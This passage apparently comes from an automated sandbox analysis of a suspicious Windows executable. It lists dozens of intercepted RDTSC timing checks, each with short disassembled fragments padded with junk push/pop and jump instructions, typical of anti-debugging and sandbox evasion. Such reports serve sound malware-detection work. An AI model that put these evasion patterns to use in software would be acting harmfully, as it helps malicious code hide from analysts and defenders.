Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 1407B63 second address: 1407B6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FA278C27B76h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 1407B6D second address: 1407B71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 1407B71 second address: 1407B7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 1407B7A second address: 1407B88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FA278C0D016h 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 1407CFD second address: 1407D03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 1407E8A second address: 1407E90 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 1410887 second address: 141088D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 141088D second address: 1410896 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 140E8E6 second address: 140E909 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA278C27B83h 0x00000007 jnp 00007FA278C27B82h 0x0000000d jp 00007FA278C27B76h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 140EBB7 second address: 140EBBF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 140EBBF second address: 140EBC5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 140EBC5 second address: 140EBD0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 140F6ED second address: 140F721 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA278C27B88h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b jmp 00007FA278C27B86h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 140F721 second address: 140F725 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 140F9F0 second address: 140F9F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 140F9F6 second address: 140FA06 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007FA278C0D01Eh 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 140FCD9 second address: 140FCDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 140FCDD second address: 140FCE3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 14102E9 second address: 14102F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FA278C27B76h 0x0000000a pop edx 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 1413EDD second address: 1413EF5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FA278C0D022h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 1414068 second address: 141407E instructions: 0x00000000 rdtsc 0x00000002 jl 00007FA278C27B76h 0x00000008 js 00007FA278C27B76h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 push esi 0x00000015 pop esi 0x00000016 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 141407E second address: 1414082 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 1414082 second address: 1414088 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 1414088 second address: 1414098 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 jg 00007FA278C0D01Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 1414098 second address: 14140B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA278C27B88h 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c pop eax 0x0000000d rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 14144C2 second address: 14144E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA278C0D021h 0x00000009 push edi 0x0000000a pop edi 0x0000000b jnc 00007FA278C0D016h 0x00000011 popad 0x00000012 popad 0x00000013 pushad 0x00000014 pushad 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 14144E7 second address: 1414503 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FA278C27B83h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 14146A0 second address: 14146A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 1423340 second address: 1423345 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 1423345 second address: 1423354 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FA278C0D016h 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 1423354 second address: 142335A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 1421A23 second address: 1421A27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 1421A27 second address: 1421A2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 1421B73 second address: 1421B82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 jg 00007FA278C0D016h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 1421B82 second address: 1421B8C instructions: 0x00000000 rdtsc 0x00000002 jng 00007FA278C27B76h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 1421B8C second address: 1421B92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 1421B92 second address: 1421BA9 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FA278C27B89h 0x00000008 jmp 00007FA278C27B7Dh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 1421D0E second address: 1421D39 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA278C0D029h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop eax 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 jnp 00007FA278C0D016h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 1421EB9 second address: 1421EBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 1421EBD second address: 1421EC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 1421EC1 second address: 1421EC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 1421EC7 second address: 1421ECF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 1421ECF second address: 1421EF9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push ebx 0x0000000a jmp 00007FA278C27B80h 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 pop ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FA278C27B7Bh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 1421EF9 second address: 1421F18 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA278C0D027h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 142205C second address: 1422062 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 1422062 second address: 1422066 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 1422066 second address: 1422093 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FA278C27B76h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d ja 00007FA278C27B76h 0x00000013 pushad 0x00000014 popad 0x00000015 jmp 00007FA278C27B86h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 14221E4 second address: 14221FD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA278C0D025h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 1420FBF second address: 1421002 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FA278C27B83h 0x00000008 jmp 00007FA278C27B7Bh 0x0000000d push edx 0x0000000e pop edx 0x0000000f jl 00007FA278C27B94h 0x00000015 jo 00007FA278C27B76h 0x0000001b jmp 00007FA278C27B88h 0x00000020 pop edx 0x00000021 pop eax 0x00000022 pushad 0x00000023 push ebx 0x00000024 pushad 0x00000025 popad 0x00000026 pop ebx 0x00000027 push ecx 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 1421002 second address: 142102B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jg 00007FA278C0D030h 0x0000000b ja 00007FA278C0D016h 0x00000011 jmp 00007FA278C0D024h 0x00000016 push eax 0x00000017 push edx 0x00000018 push ecx 0x00000019 pop ecx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 1433FF7 second address: 1433FFD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 1433FFD second address: 143400B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jbe 00007FA278C0D016h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 143400B second address: 143400F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 1434147 second address: 143414D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 143414D second address: 1434151 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 143BA93 second address: 143BA9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 143BA9A second address: 143BAA9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA278C27B7Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 143BAA9 second address: 143BAB3 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FA278C0D016h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 144138F second address: 14413A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FA278C27B76h 0x0000000a popad 0x0000000b jl 00007FA278C27B82h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 14413A2 second address: 14413A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 14429D7 second address: 14429E5 instructions: 0x00000000 rdtsc 0x00000002 je 00007FA278C27B76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 14429E5 second address: 14429EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 14429EB second address: 1442A00 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebx 0x00000009 pushad 0x0000000a jnc 00007FA278C27B78h 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 1442A00 second address: 1442A08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 1442A08 second address: 1442A26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FA278C27B85h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 14558D2 second address: 14558FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007FA278C0D01Ch 0x0000000e push edi 0x0000000f pop edi 0x00000010 jmp 00007FA278C0D01Fh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 1455A0E second address: 1455A16 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 1455A16 second address: 1455A2E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jl 00007FA278C0D016h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jnp 00007FA278C0D02Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 1455B69 second address: 1455B6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 1455B6D second address: 1455B7D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA278C0D01Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 1455FB9 second address: 1455FE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FA278C27B76h 0x0000000a jmp 00007FA278C27B7Ch 0x0000000f jmp 00007FA278C27B84h 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 1455FE4 second address: 1456001 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FA278C0D01Ah 0x00000008 jmp 00007FA278C0D01Eh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 1456001 second address: 145600E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 ja 00007FA278C27B7Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 1456C46 second address: 1456C55 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FA278C0D016h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push esi 0x0000000c pop esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 1456C55 second address: 1456C6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FA278C27B7Ch 0x0000000e rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 1456C6A second address: 1456C9B instructions: 0x00000000 rdtsc 0x00000002 jng 00007FA278C0D016h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FA278C0D01Fh 0x00000013 jmp 00007FA278C0D024h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 1456C9B second address: 1456C9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 145A6EB second address: 145A6F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FA278C0D016h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 145A87C second address: 145A880 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 149F0F8 second address: 149F0FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 7570D65 second address: 7570D9D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 movsx ebx, si 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b lea eax, dword ptr [ebp-08h] 0x0000000e jmp 00007FA278C0D01Ch 0x00000013 nop 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 jmp 00007FA278C0D029h 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 7570D9D second address: 7570DAD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA278C27B7Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 7570DAD second address: 7570DE8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA278C0D01Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007FA278C0D029h 0x00000011 nop 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FA278C0D01Dh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 7570DE8 second address: 7570DEF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 7570E02 second address: 7570E06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 7570E06 second address: 7570E0C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 7570E0C second address: 7570E8B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA278C0D023h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edi, eax 0x0000000b jmp 00007FA278C0D026h 0x00000010 test edi, edi 0x00000012 jmp 00007FA278C0D020h 0x00000017 js 00007FA2E885B882h 0x0000001d pushad 0x0000001e mov dl, cl 0x00000020 mov ecx, ebx 0x00000022 popad 0x00000023 mov eax, dword ptr [ebp-04h] 0x00000026 jmp 00007FA278C0D025h 0x0000002b mov dword ptr [esi+08h], eax 0x0000002e jmp 00007FA278C0D01Eh 0x00000033 lea eax, dword ptr [ebx+70h] 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 7570E8B second address: 7570E8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 7570E8F second address: 7570EAC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA278C0D029h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 7570EAC second address: 7570EB2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 7570EB2 second address: 7570EB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 7570EB6 second address: 7570F0E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push 00000001h 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FA278C27B85h 0x00000011 add al, FFFFFF96h 0x00000014 jmp 00007FA278C27B81h 0x00000019 popfd 0x0000001a mov esi, 3187F807h 0x0000001f popad 0x00000020 nop 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007FA278C27B89h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 7570F0E second address: 7570F14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
